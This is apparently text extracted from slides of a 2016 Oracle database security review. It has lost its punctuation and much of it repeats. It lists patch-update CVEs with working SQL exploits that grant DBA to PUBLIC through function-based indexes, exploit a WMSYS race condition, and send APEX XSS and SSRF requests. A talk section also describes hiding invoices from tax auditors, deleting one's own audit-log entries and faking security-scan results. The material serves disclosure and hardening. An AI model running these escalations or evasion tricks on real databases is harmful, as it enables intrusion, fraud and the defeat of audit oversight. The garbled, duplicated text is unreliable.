httpwwworaclecomtechnetworktopicssecuritycpuapr2015-2365600html
April 2016 CPU
5 security fixes (2 remote exploitable)
1 Java VM (CVSS 90)
1 OLAP (CVSS 78)
3 RDBMS Security (CVSS 59 33 33 1 remote)
httpwwworaclecomtechnetworksecurity-advisorycpuapr2016v3-2985753html
Apr 2016 CPU- CVE-2016-0690
httpwwwdavidlitchfieldcomOracleCPUApril2016pdf
Problem AUDIT NOT EXISTS fails to capture
attempts to execute a procedure that does not
exist either because the user does not have the
execute privilege on it or because the
procedure does not exist If a DBA wants to
capture attempts to execute procedures where
the user does not have the execute privilege we
must also add
Reporter David Litchfield
Exploit
AUDIT EXECUTE PROCEDURE WHENEVER NOT SUCCESSFUL
Apr 2016 CPU- CVE-2016-0691
httpwwwdavidlitchfieldcomOracleCPUApril2016pdf
Problem A missing (due to no execute
privilege) function is within a SELECT query the
name of the function is not logged but the
name of the table in the query
Reporter David Litchfield
Exploit obvious Create Java Sourcehellip
May 2016
Nothing special happened
June 2016
Nothing special happened
July 2016
Oracle CPU July 2016
httpwwworaclecomtechnetworksecurity-advisorycpujul2016-2881720html
July 2016
Oracle CPU July 2016
httpwwworaclecomtechnetworksecurity-advisorycpujul2016-2881720html
July 2016 CPU
9 security fixes (5 remote exploitable)
1 OJVM (CVSS 90)
1 JDBC (CVSS 81 remote)
1 Portable Clusterware (CVSS 75 remote)
1 Data Pump (CVSS 67)
2 APEX (CVSS 61 58 2 remote)
1 RDBMS Security (CVSS 53 remote)
DB Shardening (CVSS 44)
1 Database Vault (CVSS 34)
httpwwworaclecomtechnetworksecurity-advisorycpujul2016-2881720html
Jul 2016 CPU- CVE-2016-3448
httpwwwdavidlitchfieldcomOracleCPUApril2016pdf
Problem The HTMLDB_UTIL PLSQL package is
vulnerable to a XSS flaw To access it the
schema (APEX_050000) needs to be specified
first however because the config file whitelists
apex
Reporter David Litchfield
Exploit
httpexamplecomordsapex_050000htmldb_utilJSON_FROM_ARRAYP_COLS=1ampP_NAM E01=XX223E3CH13EOops3CH13EampP_F01=YampP_ROWS=1
Jul 2016 CPU- CVE-2016-3467
httpwwwdavidlitchfieldcomOracleCPUApril2016pdf
Problem Apex 5 is vulnerable to a server side
request forgery flaw ie it can be made to connect
to another web server and port regardless of
whether allowed URLs have been configured For
example the request below will connect to
someotherserver on port and POST X as a payload
This can be used as a port scanning mechanism
used to attack systems protected by a firewall etc
Reporter David Litchfield
Exploit
httpexampleordsapex_050000WWV_FLOW_WEBSERVICES_APIMAKE_REQUESTP_U RL=httpsomeotherserverportampp_envelope=X
Apr 2016 CPU- CVE-2016-3488Problem Package dbms_gsm_common allows
to change database parameter without the
admin privileges and restart
Reporter Bruno Cirone
Exploit
exec gsmadmin_internaldbms_gsm_commonsetdbparameter (O7_DICTIONARY_ACCESSIBILITYTRUE)
Jul 2016 CPU- CVE-2016-3488mdash as SYS SQLgt select namevalue from v$parameter where name=O7_DICTIONARY_ACCESSIBILITY O7_DICTIONARY_ACCESSIBILITY FALSE -- as user GSMUSER SQLgt exec gsmadmin_internaldbms_gsm_commonsetdbparameter (O7_DICTIONARY_ACCESSIBILITYTRUE) PLSQL-Prozedur erfolgreich abgeschlossen -- as user SYS -Re-Run again after execution of the package SQLgt select namevalue from v$parameter where name=O7_DICTIONARY_ACCESSIBILITY O7_DICTIONARY_ACCESSIBILITY TRUE
July 2016 CPU- CVE-2016-3484
Problem SYS CAN INFLUENCE DVSYS-ANALYSIS
Reporter Alexander Kornbrust
Problem (Details + Exploit laterhellip)
FUNCTION CHECK_BACKUP_PARM_VARCHAR RETURN VARCHAR2 IS TMP VARCHAR2(32767) TMP2 VARCHAR2(32767)
BEGIN SELECT DVSYSDV_SQL_TEXT INTO TMP FROM DUAL IF LENGTH(TMP) = 4000 THEN RETURN rsquoN END IF TMP2 = UPPER(TMP) IF (TMP2) LIKE RECYCLEBIN AND (TMP2) LIKE ON THEN RETURN N END IF RETURN Y END
July 2016 CPU- CVE-2016-3489
Problem Privilege escalation via INDEX privilege
and function based index (FBI)
Reporter Alexander Kornbrust
July 2016 CPU- CVE-2016-3489
mdash Oracle 11204 SYSTEMSQLgt select grantee owner table_name FROM DBA_TAB_PRIVS WHERE PRIVILEGE = INDEX AND GRANTEE=OWNER and owner=SYS GRANTEE OWNER TABLE_NAME -------------------------------------------------------------------------------------- SYSTEM SYS INCEXP SYSTEM SYS INCFIL SYSTEM SYS INCVID SYSTEMSQLgt CREATE OR REPLACE FUNCTION GETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS 2 PRAGMA AUTONOMOUS_TRANSACTION 3 BEGIN 4 execute immediate grant select on syslink$ to public 5 COMMIT 6 RETURN FOO 7 END
SQLgt grant execute on getdba to public
July 2016 CPU- CVE-2016-3489==gt System does not have access to the SYSLINK$ table SQLgt select count() from syslink$ ERROR at line 1 ORA-01031 insufficient privileges
==gt also the execution of getdba throws an errorSQLgt select getdba(i) from dual ERROR at line 1 ORA-01031 insufficient privileges ORA-06512 at SYSTEMGETDBA line 4 ==gt Now create an index on the table sysincvid using a function based index SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSINCVID(SYSTEMGETDBA(AK)) Index created SQLgt select count() from syslink$ COUNT() ---------- 11
July 2016 CPU- CVE-2016-3489-- Oracle 12102 (SYSTEM does no longer have INHERIT ANY PRIVILEGE) SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSINCvid(SYSTEMGETDBA(1)) CREATE INDEX EXPLOIT_INDEX ON SYSINCvid(SYSTEMGETDBA(1)) FEHLER in Zeile 1 ORA-06598 Nicht ausreichende INHERIT PRIVILEGES-Berechtigung ORA-06512 in SYSTEMGETDBA Zeile 1
-- On 12102 the user WMSYS has CREATE ANY INDEX and the SYSTEM user can use the -- CREATE ANY PROCEDURE to create a function in the schema of WMSYS
CREATE OR REPLACE FUNCTION wmsysGETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS PRAGMA AUTONOMOUS_TRANSACTION BEGIN execute immediate grant select on syslink$ to public COMMIT RETURN FOO END SQLgt grant execute on wmsysgetdba to public
-- now we create the index SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSINCVID(WMSYSGETDBA(AK))
August 2016Hackproofing Oraclersquos eBusiness Suite by David
Litchfield
Presentation + Supporting documents
httpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suitepdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-1pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-2pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-3pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-4pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-5pdf
September 2016iexcl Nothing special happened
x
October 2016
Oracle CPU October 2016
httpwwworaclecomtechnetworksecurity-advisorycpuoct2016-2881722html
October 2016 CPU
9 security fixes (1 remote exploitable)
1 OJVM (CVSS 91)
2 KernelPDB (CVSS 6460)
3 RDBMS Security (CVSS 64 33 33)
1 APEX (CVSS 61 remote)
1 RDBMS Security amp SQLPlus (CVSS 24)
httpwwworaclecomtechnetworksecurity-advisorycpuoct2016-2881722html
Oct 2016 CPU- CVE-2016-5497
Problem UNSALTED MD5 HASH STILL PRESENT IN
12C DATABASE - DIGEST VERIFIER
Shown as open problem at the DOAG 2015
presentation
Reporter Alexander Kornbrust
Oracle Password Hash 12102+
Oracle 12102 introduced a new PBKDF2
SHA512 based algorithm
The new T Password hash is 10 times slower than
the old DES hash (Oracle 7+) and 88 times slower
than the SHA1-based hash (Oracle 11+)
The new algorithm is known and already
implemented in some tools
Remark Microsoft Office 2013 is 10 times more
time consuming to crack than the new Oracle
PBKDF2
Oracle Password Hash 12102+
Letrsquos have a look at the RFC2617
KD(secret data) = H(concat(secret data))
No salt but a secret
Secret= XDBlsquo
and the hash will be MD5(XDBtiger)
and stored in the spare4-column starting with the HHash
Oct 2016 CPU- CVE-2016-5516
Problem In Oracle 12c the DBMS_PDB_EXEC_SQL
procedure is a wrapper for the
DBMS_PDBEXEC_AS_ORACLE_SCRIPT procedure which executes SQL as the SYS user The XDB user has the execute privilege on
DBMS_PDB_EXEC_SQL and as such by first exploiting
a vulnerability in a publicly executable XDB owned PLSQL object an attacker can leverage this
privilege to execute SQL as SYS The fix changes both
DBMS_PDB_EXEC_SQL and DBMS_PDB from using the
DEFINER rights to the INVOKER rights execution model Reporter David Litchfield
Oct 2016 CPU- CVE-2016-5604
Problem Privilege Escalation in Oracle Cloud
Control (1213)
Reporter Alexander Kornbrust
sqlplus sysman_apmrdsora1 SQLgtdesc dba_users ERROR ORA-04043 object SYSDBA_USERS does not exist
==gt user does not have the privilege to access DBA_USERS SQLgtselect from user_sys_privs USERNAME PRIVILEGE ADM ------------------------------ ---------------------------------------- --- SYSMAN_APM UNLIMITED TABLESPACE NO SYSMAN_APM CREATE VIEW NO SYSMAN_APM CREATE ANY LIBRARY NO SYSMAN_APM CREATE SEQUENCE NO SYSMAN_APM CREATE TABLE NO SYSMAN_APM CREATE LIBRARY NO SYSMAN_APM CREATE ANY INDEX NO
==gt CREATE ANY LIBRARY Privilege is granted to SYSMAN_APM SQLgtselect from user_role_privs USERNAME GRANTED_ROLE ADM DEF OS_ ------------------------------ ------------------------------ --- --- --- SYSMAN_APM CONNECT NO YES NO SYSMAN_APM RESOURCE NO YES NO
==gt Create a function GETDBA to escalate privileges using AUTHID CURRENT_USER SQLgtCREATE OR REPLACE FUNCTION GETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS 2 PRAGMA AUTONOMOUS_TRANSACTION 3 BEGIN 4 execute immediate grant dba to public 5 COMMIT 6 RETURN FOO 7 END 8 ==gt Grant execution privileges to PUBLIC SQLgt grant execute on getdba to public
==gt Create an index on SYSTEMHELP using a function based index (FBI) The function getdba is used for the function based index SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSTEMHELP(SYSMAN_APMGETDBA(AK2))
==gt Reconnect is necessary SQLgt select from dba_role_privs where granted_role=DBA and grantee=PUBLIC GRANTEE GRANTED_ROLE ADM DEF ------------------------------ ------------------------------ --- --- PUBLIC DBA NO YES
November 2016
DOAG 2016
Modifying SQL Statements and Application Logic
Scenario 1
Top manager comes to the office of the DBA
and asks youbdquoTomorrow the auditor from the tax authority will
come to check our invoices Could you hide the
10000 EUR invoice just from the auditor from the
last party at the night clubI will increase your salaryhellipldquo
Scenario 2
Remove your own audit entries from the audit
log which is retrieved by the SIEM solution (eg
Splunk QRadar hellip) via JDBC
Scenario 3
You donrsquot have time to harden all your
databases but the security department wants to
see resultsInstead of fixing the problem you will just deliver
the proper results
A lot of different wisheshellip
but luckily we are using Oracle
ProblemampSolution
Oracle offers different features to fulfill these
wishes without affecting other usershellip
All these scenarios have in common that we
have to manipulate SQL statement
Select value hellip
Oracle Data Redaction allows to mask
manipulate the selected data just for a single
database user
Possible Usage replace truefalse replace USERADMINhellip
the DBA can decide what will be returned
Select value hellip
A typical query from security checklistsscanner looks
like this select upper(value) from parameter where upper(name) = XYZ
The tool expects the value TRUE but it contains FALSE
Oracle data redaction allows you to change the
result value from FALSE to TRUE==gt Audit department is happy because the database passes all the security checkshellip
hellip from tableview hellip
Modifying objects can change be used as man
in the middle as well
Possible approaches
modify views (eg add spare=DBA1 to the view dba_audit_trail)All entries of the OSUSER DBA1 will be removed in the view If a SIEM solution retrieves the audit data stuff from DBA1 is not retrieved
create or change synonyms to bdquoredirectldquo objects
replace table with viewinstead of trigger
mdashmdashmdashmdashmdash dbms_macadmmdashmdashmdashmdashmdash FUNCTION CHECK_BACKUP_PARM_VARCHAR RETURN VARCHAR2 IS TMP VARCHAR2(32767) TMP2 VARCHAR2(32767)
BEGIN SELECT DVSYSDV_SQL_TEXT INTO TMP FROM DUAL IF LENGTH(TMP) = 4000 THEN RETURN rsquoN END IF TMP2 = UPPER(TMP) IF (TMP2) LIKE RECYCLEBIN AND (TMP2) LIKE ON THEN RETURN N END IF RETURN Y END
SQLgt create or replace view mydual as select X as dummy from dual where user=DVSYS
SQLgt grant select on sysmydual to public SQLgt drop public synonym dual SQLgt create public synonym dual for sysmydual
SYS CAN INFLUENCE DVSYS-ANALYSIS VIA VIEW NAMED DUAL
Red Attack - Die Katastrophe in der Datenbank (Gunther Pipperr)
hellip where x=y
where conditions can be changed using VPD
VPD add where clauseinvoice_name = SAUNA_CLUB CHANTAL
Hide bdquocertainldquo invoices from the audit
department
Select value from tableview where x=y
SQL Translation Framework (12c only) allows to
replace an entire queryUser submits Query A SQL Translation Framework replaces Query A
with Query B
Possible Countermeasures for paranoid Auditors
Add a random string eg aksdjhiuz to avoid
SQL Translation Framework (new SQLID)
Try to get EXEMPT ACCESS POLICY to disable
VPD (even if not used in the application)
Use full qualified names instead of synonyms(eg SYSDUAL instead of DUAL)
Always check the object type (is is really a table)
Use checksums for certain database objects
(especially views)
Check the current schema to avoid attacks
(eg alter session set current_schema=otheruser)
Modifying Queries on the fly
Powerful features for application
(Huge) potential on critical systems to modify
application logic (eg DB Vault)
DBAs and AuditorsSecurity Department should
be aware of powerful Oracle features which
could be used to modify application logic
Audit these features even if not in use
Trends 2017
New hardening documents for Oracle 122
required (new features new packages hellip)
Migration to 122
More auditing projects
Integration Auditing with SIEM solutions
Q amp A
Thank you Contact
Red-Database-Security GmbH
Eibenweg 42
D-63150 Heusenstamm
Germany
Oracle Vulnerabilities 2016
Number of vulnerabilities in Oracle database increasing again
iexcl 30 findings in 2016 (2015 29 2014 43 2013 13 2012 17)
iexcl 8 remote exploitable bugs (20153 2014 4 2013 7 2012 8 )
bull January 2016 CPU (7 Vulnerabilities ndash 0 remote)
bull April 2016 CPU (5 Vulnerabilities ndash 2 remote)
bull July 2016 CPU (9 Vulnerabilities ndash 5 remote)
bull October 2016 CPU (9 Vulnerabilities ndash 1 remote)
2016
January 2016
Oracle CPU January 2016
Exploiting the Oracle Workspace Manager SQL
Race Condition (David Litchfield)
DB Database Assessment Tool
httpwwworaclecomtechnetworktopicssecuritycpujan2016-2367955html httpwwwdavidlitchfieldcomExploitingtheOracleWorkspaceManagerSQLRaceConditionpdf httpsgithubcomfoospidyDbDat
January 2016 CPU
7 security fixes (No remote exploitable)
1 Java VM (CVSS 90)
1 Workspace Manager (CVSS 65)
2 XML Database (CVSS 55 40)
1 Database Vault (CVSS 40)
1 Security (CVSS 40)
1 XML Developerrsquos Kit (CVSS 40)
httpwwworaclecomtechnetworktopicssecuritycpujan2016-2367955html
Jan 2016 CPU- CVE-2016-0467
httpwwwdavidlitchfieldcomDetailsforOraclesJanuary2016CPUpdf
Problem Oracle native auditing fails to capture
bdquoCreate Java Sourceldquo
Reporter David Litchfield
Exploit obvious Create Java Sourcehellip
Jan 2016 CPU- CVE-2015-4921
httpwwwdavidlitchfieldcomDetailsforOraclesJanuary2016CPUpdf
Problem Status is incorrectly reported if SYS
Auditing is used together with DB Vault
Reporter David Litchfield
Jan 2016 CPU- CVE-2015-4925
httpwwwdavidlitchfieldcomDetailsforOraclesJanuary2016CPUpdf
Problem Privilege escalation via Race Condition
in WMSYSLTCOPYFORUPDATE
Reporter David Litchfield
The Oracle Workspace Manager allows a user to version enable database tables This is achieved by creating workspaces which contain the versioned data The Workspace Manager contains a number of PLSQL packages that are used to manage workspaces To function correctly some management actions must be performed with higher privileges than a normal user might have and so to enable this some of the management functions execute with the privileges of the WMSYS user The main workspace manager interface is the LT PLSQL package and this executes with the privileges of the user that calls or invokes LT When privileged work is required to be executed LT calls the LTADM package The LTADM package executes with the privileges of the owner or definer in this case WMSYS WMSYS has a number of very powerful privileges such as CREATE ANY TRIGGER that allows the grantee the privilege to create a trigger in any schema with the exception of the SYS schema
Jan 2016 CPU- CVE-2015-4925
SELECT COUNT() INTO CNTFROM V$OPEN_CURSOR OC V$SQL S V$OBJECT_DEPENDENCY OD WHERE OCSID = USER_SID AND [hellip] AND ODTO_TYPE IN (78911)
Here ODTO_TYPEs 789 and 11 are functions procedures packages and objects If any such dependency exists then the user supplied query will not be executed and an error is raised IF (CNTgt0) THEN WMSYSWM_ERRORRAISEERROR(WMSYSLTWM_ERROR_81_NO) END IF
SQL_STR2 =declaredelstatuses wmsysltUtilnumber_tab beginselect WM_delstatus bulk collect into delstatusesfrom || WMSYSLTUTILGETVN(TABLE_OWNER TAB_NAME _BASE) || where WM_version = || CURVER || and || NEWWHERE_CLAUSE || for updateend WMSYSLTADMEXECSQL(SQL_STR2)
Jan 2016 CPU- CVE-2015-4925SQLgt CONNECT RACERPASSWORD SQLgt CREATE TABLE FOO(X NUMBER CONSTRAINT X_PK PRIMARY KEY(X)) SQLgt INSERT INTO FOO (X) VALUES (1) SQLgt COMMITSQLgt EXEC WMSYSLTENABLEVERSIONING(sbquoFOO)
SQLgt create or replace function Y return number authid current_user is 2 pragma autonomous_transaction3 begin4 dbms_outputput_line(BANG)5 execute immediate create or replace procedure owned(p varchar) is begin execute immediate p end6 execute immediate grant execute on owned to public7 dbms_outputput_line(sys_context(userenvcurrent_user)) 8 return 19 end 10
Jan 2016 CPU- CVE-2015-4925SQLgt GRANT EXECUTE ON Y TO PUBLIC SQLgt CREATE TABLE RACER(Y NUMBER) SQLgt INSERT INTO RACER(Y) VALUES (1) SQLgt COMMIT
SQLgt create or replace procedure attempt_it is 2 begin 3 execute immediate BEGIN WMSYSLTCOPYFORUPDATE(FOOX=LENGTH((SELECT 1 FROM RACERRACER WHERE RACERY=1))) END 4 exception when others then 5 null6 end7 SQLgt declare2 i number=0 3 begin4 for i in 11000 loop 5 execute immediate alter table RACERRACER rename column Y to Z6 execute immediate alter table RACERRACER rename column Z to Y7 end loop 8 end9
Jan 2016 CPU- CVE-2015-4925
SQLgt DESC WMSYSOWNED
PROCEDURE WMSYSOWNED Argument Name Type InOut Default mdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdash-
P VARCHAR2 IN
February 2016
nothing special happened
March 2016
nothing special happened
April 2016
Oracle CPU April 2016
httpwwworaclecomtechnetworktopicssecuritycpuapr2015-2365600html
April 2016 CPU
5 security fixes (2 remote exploitable)
1 Java VM (CVSS 90)
1 OLAP (CVSS 78)
3 RDBMS Security (CVSS 59 33 33 1 remote)
httpwwworaclecomtechnetworksecurity-advisorycpuapr2016v3-2985753html
Apr 2016 CPU- CVE-2016-0690
httpwwwdavidlitchfieldcomOracleCPUApril2016pdf
Problem AUDIT NOT EXISTS fails to capture
attempts to execute a procedure that does not
exist either because the user does not have the
execute privilege on it or because the
procedure does not exist If a DBA wants to
capture attempts to execute procedures where
the user does not have the execute privilege we
must also add
Reporter David Litchfield
Exploit
AUDIT EXECUTE PROCEDURE WHENEVER NOT SUCCESSFUL
Apr 2016 CPU- CVE-2016-0691
httpwwwdavidlitchfieldcomOracleCPUApril2016pdf
Problem A missing (due to no execute
privilege) function is within a SELECT query the
name of the function is not logged but the
name of the table in the query
Reporter David Litchfield
Exploit obvious Create Java Sourcehellip
May 2016
Nothing special happened
June 2016
Nothing special happened
July 2016
Oracle CPU July 2016
httpwwworaclecomtechnetworksecurity-advisorycpujul2016-2881720html
July 2016
Oracle CPU July 2016
httpwwworaclecomtechnetworksecurity-advisorycpujul2016-2881720html
July 2016 CPU
9 security fixes (5 remote exploitable)
1 OJVM (CVSS 90)
1 JDBC (CVSS 81 remote)
1 Portable Clusterware (CVSS 75 remote)
1 Data Pump (CVSS 67)
2 APEX (CVSS 61 58 2 remote)
1 RDBMS Security (CVSS 53 remote)
DB Shardening (CVSS 44)
1 Database Vault (CVSS 34)
httpwwworaclecomtechnetworksecurity-advisorycpujul2016-2881720html
Jul 2016 CPU- CVE-2016-3448
httpwwwdavidlitchfieldcomOracleCPUApril2016pdf
Problem The HTMLDB_UTIL PLSQL package is
vulnerable to a XSS flaw To access it the
schema (APEX_050000) needs to be specified
first however because the config file whitelists
apex
Reporter David Litchfield
Exploit
httpexamplecomordsapex_050000htmldb_utilJSON_FROM_ARRAYP_COLS=1ampP_NAM E01=XX223E3CH13EOops3CH13EampP_F01=YampP_ROWS=1
Jul 2016 CPU- CVE-2016-3467
httpwwwdavidlitchfieldcomOracleCPUApril2016pdf
Problem Apex 5 is vulnerable to a server side
request forgery flaw ie it can be made to connect
to another web server and port regardless of
whether allowed URLs have been configured For
example the request below will connect to
someotherserver on port and POST X as a payload
This can be used as a port scanning mechanism
used to attack systems protected by a firewall etc
Reporter David Litchfield
Exploit
httpexampleordsapex_050000WWV_FLOW_WEBSERVICES_APIMAKE_REQUESTP_U RL=httpsomeotherserverportampp_envelope=X
Apr 2016 CPU- CVE-2016-3488Problem Package dbms_gsm_common allows
to change database parameter without the
admin privileges and restart
Reporter Bruno Cirone
Exploit
exec gsmadmin_internaldbms_gsm_commonsetdbparameter (O7_DICTIONARY_ACCESSIBILITYTRUE)
Jul 2016 CPU- CVE-2016-3488mdash as SYS SQLgt select namevalue from v$parameter where name=O7_DICTIONARY_ACCESSIBILITY O7_DICTIONARY_ACCESSIBILITY FALSE -- as user GSMUSER SQLgt exec gsmadmin_internaldbms_gsm_commonsetdbparameter (O7_DICTIONARY_ACCESSIBILITYTRUE) PLSQL-Prozedur erfolgreich abgeschlossen -- as user SYS -Re-Run again after execution of the package SQLgt select namevalue from v$parameter where name=O7_DICTIONARY_ACCESSIBILITY O7_DICTIONARY_ACCESSIBILITY TRUE
July 2016 CPU- CVE-2016-3484
Problem SYS CAN INFLUENCE DVSYS-ANALYSIS
Reporter Alexander Kornbrust
Problem (Details + Exploit laterhellip)
FUNCTION CHECK_BACKUP_PARM_VARCHAR RETURN VARCHAR2 IS TMP VARCHAR2(32767) TMP2 VARCHAR2(32767)
BEGIN SELECT DVSYSDV_SQL_TEXT INTO TMP FROM DUAL IF LENGTH(TMP) = 4000 THEN RETURN rsquoN END IF TMP2 = UPPER(TMP) IF (TMP2) LIKE RECYCLEBIN AND (TMP2) LIKE ON THEN RETURN N END IF RETURN Y END
July 2016 CPU- CVE-2016-3489
Problem Privilege escalation via INDEX privilege
and function based index (FBI)
Reporter Alexander Kornbrust
July 2016 CPU- CVE-2016-3489
mdash Oracle 11204 SYSTEMSQLgt select grantee owner table_name FROM DBA_TAB_PRIVS WHERE PRIVILEGE = INDEX AND GRANTEE=OWNER and owner=SYS GRANTEE OWNER TABLE_NAME -------------------------------------------------------------------------------------- SYSTEM SYS INCEXP SYSTEM SYS INCFIL SYSTEM SYS INCVID SYSTEMSQLgt CREATE OR REPLACE FUNCTION GETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS 2 PRAGMA AUTONOMOUS_TRANSACTION 3 BEGIN 4 execute immediate grant select on syslink$ to public 5 COMMIT 6 RETURN FOO 7 END
SQLgt grant execute on getdba to public
July 2016 CPU- CVE-2016-3489==gt System does not have access to the SYSLINK$ table SQLgt select count() from syslink$ ERROR at line 1 ORA-01031 insufficient privileges
==gt also the execution of getdba throws an errorSQLgt select getdba(i) from dual ERROR at line 1 ORA-01031 insufficient privileges ORA-06512 at SYSTEMGETDBA line 4 ==gt Now create an index on the table sysincvid using a function based index SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSINCVID(SYSTEMGETDBA(AK)) Index created SQLgt select count() from syslink$ COUNT() ---------- 11
July 2016 CPU- CVE-2016-3489-- Oracle 12102 (SYSTEM does no longer have INHERIT ANY PRIVILEGE) SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSINCvid(SYSTEMGETDBA(1)) CREATE INDEX EXPLOIT_INDEX ON SYSINCvid(SYSTEMGETDBA(1)) FEHLER in Zeile 1 ORA-06598 Nicht ausreichende INHERIT PRIVILEGES-Berechtigung ORA-06512 in SYSTEMGETDBA Zeile 1
-- On 12102 the user WMSYS has CREATE ANY INDEX and the SYSTEM user can use the -- CREATE ANY PROCEDURE to create a function in the schema of WMSYS
CREATE OR REPLACE FUNCTION wmsysGETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS PRAGMA AUTONOMOUS_TRANSACTION BEGIN execute immediate grant select on syslink$ to public COMMIT RETURN FOO END SQLgt grant execute on wmsysgetdba to public
-- now we create the index SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSINCVID(WMSYSGETDBA(AK))
August 2016Hackproofing Oraclersquos eBusiness Suite by David
Litchfield
Presentation + Supporting documents
httpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suitepdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-1pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-2pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-3pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-4pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-5pdf
September 2016iexcl Nothing special happened
x
October 2016
Oracle CPU October 2016
httpwwworaclecomtechnetworksecurity-advisorycpuoct2016-2881722html
October 2016 CPU
9 security fixes (1 remote exploitable)
1 OJVM (CVSS 91)
2 KernelPDB (CVSS 6460)
3 RDBMS Security (CVSS 64 33 33)
1 APEX (CVSS 61 remote)
1 RDBMS Security amp SQLPlus (CVSS 24)
httpwwworaclecomtechnetworksecurity-advisorycpuoct2016-2881722html
Oct 2016 CPU- CVE-2016-5497
Problem UNSALTED MD5 HASH STILL PRESENT IN
12C DATABASE - DIGEST VERIFIER
Shown as open problem at the DOAG 2015
presentation
Reporter Alexander Kornbrust
Oracle Password Hash 12102+
Oracle 12102 introduced a new PBKDF2
SHA512 based algorithm
The new T Password hash is 10 times slower than
the old DES hash (Oracle 7+) and 88 times slower
than the SHA1-based hash (Oracle 11+)
The new algorithm is known and already
implemented in some tools
Remark Microsoft Office 2013 is 10 times more
time consuming to crack than the new Oracle
PBKDF2
Oracle Password Hash 12102+
Letrsquos have a look at the RFC2617
KD(secret data) = H(concat(secret data))
No salt but a secret
Secret= XDBlsquo
and the hash will be MD5(XDBtiger)
and stored in the spare4-column starting with the HHash
Oct 2016 CPU- CVE-2016-5516
Problem In Oracle 12c the DBMS_PDB_EXEC_SQL
procedure is a wrapper for the
DBMS_PDBEXEC_AS_ORACLE_SCRIPT procedure which executes SQL as the SYS user The XDB user has the execute privilege on
DBMS_PDB_EXEC_SQL and as such by first exploiting
a vulnerability in a publicly executable XDB owned PLSQL object an attacker can leverage this
privilege to execute SQL as SYS The fix changes both
DBMS_PDB_EXEC_SQL and DBMS_PDB from using the
DEFINER rights to the INVOKER rights execution model Reporter David Litchfield
Oct 2016 CPU- CVE-2016-5604
Problem Privilege Escalation in Oracle Cloud
Control (1213)
Reporter Alexander Kornbrust
sqlplus sysman_apmrdsora1 SQLgtdesc dba_users ERROR ORA-04043 object SYSDBA_USERS does not exist
==gt user does not have the privilege to access DBA_USERS SQLgtselect from user_sys_privs USERNAME PRIVILEGE ADM ------------------------------ ---------------------------------------- --- SYSMAN_APM UNLIMITED TABLESPACE NO SYSMAN_APM CREATE VIEW NO SYSMAN_APM CREATE ANY LIBRARY NO SYSMAN_APM CREATE SEQUENCE NO SYSMAN_APM CREATE TABLE NO SYSMAN_APM CREATE LIBRARY NO SYSMAN_APM CREATE ANY INDEX NO
==gt CREATE ANY LIBRARY Privilege is granted to SYSMAN_APM SQLgtselect from user_role_privs USERNAME GRANTED_ROLE ADM DEF OS_ ------------------------------ ------------------------------ --- --- --- SYSMAN_APM CONNECT NO YES NO SYSMAN_APM RESOURCE NO YES NO
==gt Create a function GETDBA to escalate privileges using AUTHID CURRENT_USER SQLgtCREATE OR REPLACE FUNCTION GETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS 2 PRAGMA AUTONOMOUS_TRANSACTION 3 BEGIN 4 execute immediate grant dba to public 5 COMMIT 6 RETURN FOO 7 END 8 ==gt Grant execution privileges to PUBLIC SQLgt grant execute on getdba to public
==gt Create an index on SYSTEMHELP using a function based index (FBI) The function getdba is used for the function based index SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSTEMHELP(SYSMAN_APMGETDBA(AK2))
==gt Reconnect is necessary SQLgt select from dba_role_privs where granted_role=DBA and grantee=PUBLIC GRANTEE GRANTED_ROLE ADM DEF ------------------------------ ------------------------------ --- --- PUBLIC DBA NO YES
November 2016
DOAG 2016
Modifying SQL Statements and Application Logic
Scenario 1
Top manager comes to the office of the DBA
and asks youbdquoTomorrow the auditor from the tax authority will
come to check our invoices Could you hide the
10000 EUR invoice just from the auditor from the
last party at the night clubI will increase your salaryhellipldquo
Scenario 2
Remove your own audit entries from the audit
log which is retrieved by the SIEM solution (eg
Splunk QRadar hellip) via JDBC
Scenario 3
You donrsquot have time to harden all your
databases but the security department wants to
see resultsInstead of fixing the problem you will just deliver
the proper results
A lot of different wisheshellip
but luckily we are using Oracle
ProblemampSolution
Oracle offers different features to fulfill these
wishes without affecting other usershellip
All these scenarios have in common that we
have to manipulate SQL statement
Select value hellip
Oracle Data Redaction allows to mask
manipulate the selected data just for a single
database user
